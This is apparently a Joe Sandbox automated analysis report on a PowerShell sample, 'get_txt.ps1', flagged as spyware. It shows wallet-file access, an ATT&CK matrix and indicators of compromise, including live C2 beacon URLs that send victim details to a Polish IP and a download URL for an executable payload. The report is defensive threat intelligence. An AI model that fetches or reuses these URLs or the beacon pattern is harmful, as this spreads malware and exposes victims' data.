                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Windows\Temp\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: Yara matchFile source: 0000000A.00000003.2043952153.0000000000C12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6128, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6128, type: MEMORYSTR
                          Source: Yara matchFile source: 10.3.cmd.exe.c50000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.3.cmd.exe.c50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000003.1899525334.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          2
                          OS Credential Dumping
                          2
                          File and Directory Discovery
                          Remote Services1
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          PowerShell
                          Boot or Logon Initialization Scripts12
                          Process Injection
                          4
                          Obfuscated Files or Information
                          LSASS Memory42
                          System Information Discovery
                          Remote Desktop Protocol4
                          Data from Local System
                          21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
                          Software Packing
                          Security Account Manager341
                          Security Software Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          11
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading
                          NTDS2
                          Process Discovery
                          Distributed Component Object Model2
                          Clipboard Data
                          3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                          Masquerading
                          LSA Secrets231
                          Virtualization/Sandbox Evasion
                          SSHKeylogging114
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials1
                          Application Window Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Process Injection
                          DCSync1
                          System Network Configuration Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          get_txt.ps18%ReversingLabs
                          get_txt.ps113%VirustotalBrowse
                          SourceDetectionScannerLabelLink
                          C:\Windows\Temp\cmd.exe14%ReversingLabsWin32.Trojan.Doina
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://91.206.178.120:5001/script_end?random_number=$randomNumber100%Avira URL Cloudmalware
                          https://healthyjouprney.tech/0%Avira URL Cloudsafe
                          https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exe100%Avira URL Cloudmalware
                          https://healthyjouprney.tech/A0%Avira URL Cloudsafe
                          healthyjouprney.tech0%Avira URL Cloudsafe
                          https://healthyjouprney.tech/apig0%Avira URL Cloudsafe
                          http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m100%Avira URL Cloudmalware
                          http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft100%Avira URL Cloudmalware
                          https://healthyjouprney.tech/apiF0%Avira URL Cloudsafe
                          https://healthyjouprney.tech/apior0%Avira URL Cloudsafe
                          https://healthyjouprney.tech/api0%Avira URL Cloudsafe
                          https://healthyjouprney.tech:443/api0%Avira URL Cloudsafe
                          https://healthyjouprney.tech/api00%Avira URL Cloudsafe
                          http://91.206.178.120:5001/script_end?random_number=100%Avira URL Cloudmalware
                          http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra100%Avira URL Cloudmalware
                          http://91.206.178.120:5001100%Avira URL Cloudmalware
                          https://healthyjouprney.tech/apiied0%Avira URL Cloudsafe
                          http://91.206.178.120:5001/script_start?ip=100%Avira URL Cloudmalware
                          http://91.206.178.120:5001/script_end?random_number=29634$M100%Avira URL Cloudmalware
                          https://sandramosquedamx.com0%Avira URL Cloudsafe
                          http://91.206.178.120:5001/script_end?random_number=29634100%Avira URL Cloudmalware
                          http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634100%Avira URL Cloudmalware
                          https://healthyjouprney.tech/apimeP0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          healthyjouprney.tech
                          188.114.97.3
                          truetrue
                            unknown
                            api.ipify.org
                            104.26.13.205
                            truefalse
                              high
                              sandramosquedamx.com
                              35.208.212.94
                              truetrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                nestlecompany.worldfalse
                                  high
                                  https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exetrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  blast-hubs.comfalse
                                    high
                                    healthyjouprney.techtrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    stormlegue.comfalse
                                      high
                                      http://api.ipify.org/false
                                        high
                                        https://healthyjouprney.tech/apitrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        nestlecompany.profalse
                                          high
                                          mercharena.bizfalse
                                            high
                                            http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634true
                                            • Avira URL Cloud: malware
                                            unknown
                                            blastikcn.comfalse
                                              high
                                              generalmills.profalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabcmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                    high
                                                    http://crl.microsoftpowershell.exe, 00000000.00000002.1425682486.0000000007BDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://91.206.178.120:5001/script_end?random_number=$randomNumbernotepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, get_txt.ps1true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://healthyjouprney.tech/apiFcmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contoso.com/Licensepowershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                          high
                                                          https://healthyjouprney.tech/Acmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://healthyjouprney.tech/cmd.exe, 0000000A.00000002.2102253733.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2025610040.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043885038.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2041606518.0000000000C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoftpowershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mpowershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://healthyjouprney.tech/apigcmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://x1.c.lencr.org/0cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drfalse
                                                              high
                                                              http://x1.i.lencr.org/0cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drfalse
                                                                high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                                  high
                                                                  https://contoso.com/powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://healthyjouprney.tech/apiorcmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://healthyjouprney.tech:443/apicmd.exe, 0000000A.00000003.2074794526.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allcmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKB36A69092427CC90.dat.10.drfalse
                                                                            high
                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icocmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                                                high
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://91.206.178.120:5001/script_end?random_number=29634$Mpowershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://91.206.178.120:5001/script_end?random_number=powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contoso.com/Iconpowershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                                                          high
                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drfalse
                                                                                            high
                                                                                            http://ocsp.rootca1.amazontrust.com0:cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drfalse
                                                                                              high
                                                                                              http://91.206.178.120:5001/script_start?ip=powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://www.ecosia.org/newtab/cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                                                                high
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brB36A69092427CC90.dat.10.drfalse
                                                                                                  high
                                                                                                  http://91.206.178.120:5001powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://api.ipify.orgpowershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1false
                                                                                                      high
                                                                                                      https://ac.ecosia.org/autocomplete?q=cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                                                                        high
                                                                                                        https://healthyjouprney.tech/api0cmd.exe, 0000000A.00000002.2102253733.0000000000C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$rapowershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1false
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        https://healthyjouprney.tech/apiiedcmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043952153.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://sandramosquedamx.compowershell.exe, 00000000.00000002.1405953720.0000000004918000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://91.206.178.120:5001/script_end?random_number=29634powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drfalse
                                                                                                          high
                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9ecmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgcmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://support.mozilla.orgB36A69092427CC90.dat.10.drfalse
                                                                                                                high
                                                                                                                https://healthyjouprney.tech/apimePcmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  188.114.97.3
                                                                                                                  healthyjouprney.techEuropean Union
                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                  35.208.212.94
                                                                                                                  sandramosquedamx.comUnited States
                                                                                                                  19527GOOGLE-2UStrue
                                                                                                                  91.206.178.120
                                                                                                                  unknownPoland
                                                                                                                  200088ARTNET2PLtrue
                                                                                                                  104.26.13.205
                                                                                                                  api.ipify.orgUnited States
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                  Analysis ID:1617749
                                                                                                                  Start date and time:2025-02-18 08:28:25 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 6m 9s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:15
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:get_txt.ps1
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winPS1@5/21@3/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 50%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 91%
                                                                                                                  • Number of executed functions: 57
                                                                                                                  • Number of non-executed functions: 74
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .ps1
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4904 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  TimeTypeDescription
                                                                                                                  02:29:19API Interceptor54x Sleep call for process: powershell.exe modified
                                                                                                                  04:19:50API Interceptor18x Sleep call for process: cmd.exe modified
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  188.114.97.3PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.kdjsswzx.club/9nn7/
                                                                                                                  http://ilocation.live/ztBGet hashmaliciousUnknownBrowse
                                                                                                                  • ilocation.live/ztB
                                                                                                                  http://case-id-1000292829236938.mashstaffing.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • case-id-1000292829236938.mashstaffing.com/banner-b1482d4c.webp
                                                                                                                  Ordine di acquisto_(PO102429)_OFT_PUMPS.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                                                  • ddrtot.shop/New/PWS/fre.php
                                                                                                                  PO# 81136575.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.sbualdwhryi.info/3kya/
                                                                                                                  SHIPMENT OF THE ORIGINAL DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.kdjsswzx.club/65bl/
                                                                                                                  http://www.telegramus.org/Get hashmaliciousUnknownBrowse
                                                                                                                  • www.telegramus.org/cdn-cgi/rum?
                                                                                                                  http://ctakkponmndiri.siitusressmi.web.id/Get hashmaliciousUnknownBrowse
                                                                                                                  • ctakkponmndiri.siitusressmi.web.id/favicon.png
                                                                                                                  engine.ps1Get hashmaliciousFormBookBrowse
                                                                                                                  • www.serenityos.dev/rmwo/
                                                                                                                  PDF SCAN COPY P.O7767.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.actpisalnplay.cyou/oxsm/
                                                                                                                  91.206.178.120XkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.120:5001/script_end?random_number=33884
                                                                                                                  oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.120:5001/script_end?random_number=91530
                                                                                                                  Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.120:5001/script_end?random_number=66350
                                                                                                                  104.26.13.205XkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  R1TftmQpuQ.batGet hashmaliciousTargeted RansomwareBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                  • api.ipify.org/
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  api.ipify.orgXkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  SecuriteInfo.com.Win32.Evo-gen.5457.19170.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  LmIclOjfqc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  http://account-5036237.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  http://account-5078804.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  https://business.accounts-security-center-overview.com/caseGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUSXkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.149.252
                                                                                                                  Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  Kariny CV.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.64.1
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.22.74.216
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.74.232
